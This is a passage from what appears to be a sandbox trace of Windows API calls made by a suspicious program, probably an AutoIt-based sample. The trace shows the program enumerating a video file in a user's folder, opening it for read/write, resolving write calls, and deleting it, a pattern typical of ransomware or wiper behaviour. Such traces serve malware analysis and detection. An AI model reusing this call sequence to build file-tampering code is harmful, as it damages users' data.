lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff468790, ftCreationTime.dwHighDateTime=0x1d5dfb3, ftLastAccessTime.dwLowDateTime=0xdf92db70, ftLastAccessTime.dwHighDateTime=0x1d5d9d6, ftLastWriteTime.dwLowDateTime=0xdf92db70, ftLastWriteTime.dwHighDateTime=0x1d5d9d6, nFileSizeHigh=0x0, nFileSizeLow=0x6ccb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="sw3Tjl.mkv", cAlternateFileName="")) returned 0x90ae18 [0193.130] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0193.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0193.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0193.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0193.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.130] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.130] CharLowerBuffW (in: lpsz="byte[27851]", cchLength=0xb | out: lpsz="byte[27851]") returned 0xb [0193.130] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.130] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0193.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0193.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0193.131] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.131] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0193.131] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0193.131] FreeLibrary (hLibModule=0x75c90000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0193.132] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.132] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.132] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.132] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0193.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0193.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.133] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.133] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.133] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0193.133] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.133] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.133] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.133] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.133] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.133] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0193.133] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.133] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\sw3tjl.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0193.133] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0193.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0193.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0193.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0193.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0193.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0193.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.134] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.134] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.134] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.135] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0193.135] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.135] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.135] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0193.136] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.136] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.136] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.136] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.136] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.136] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.136] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.136] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0193.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.137] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv", lpFilePart=0x0) returned 0x3b [0193.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0193.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff468790, ftCreationTime.dwHighDateTime=0x1d5dfb3, ftLastAccessTime.dwLowDateTime=0xdf92db70, ftLastAccessTime.dwHighDateTime=0x1d5d9d6, ftLastWriteTime.dwLowDateTime=0x18520fc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x6ccb, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="sw3Tjl.mkv", cAlternateFileName="")) returned 0x90ae18 [0193.137] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\sw3tjl.mkv")) returned 1 [0193.139] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff468790, ftCreationTime.dwHighDateTime=0x1d5dfb3, ftLastAccessTime.dwLowDateTime=0xdf92db70, ftLastAccessTime.dwHighDateTime=0x1d5d9d6, ftLastWriteTime.dwLowDateTime=0x18520fc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x6ccb, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="sw3Tjl.mkv", cAlternateFileName="")) returned 0 [0193.139] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0193.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 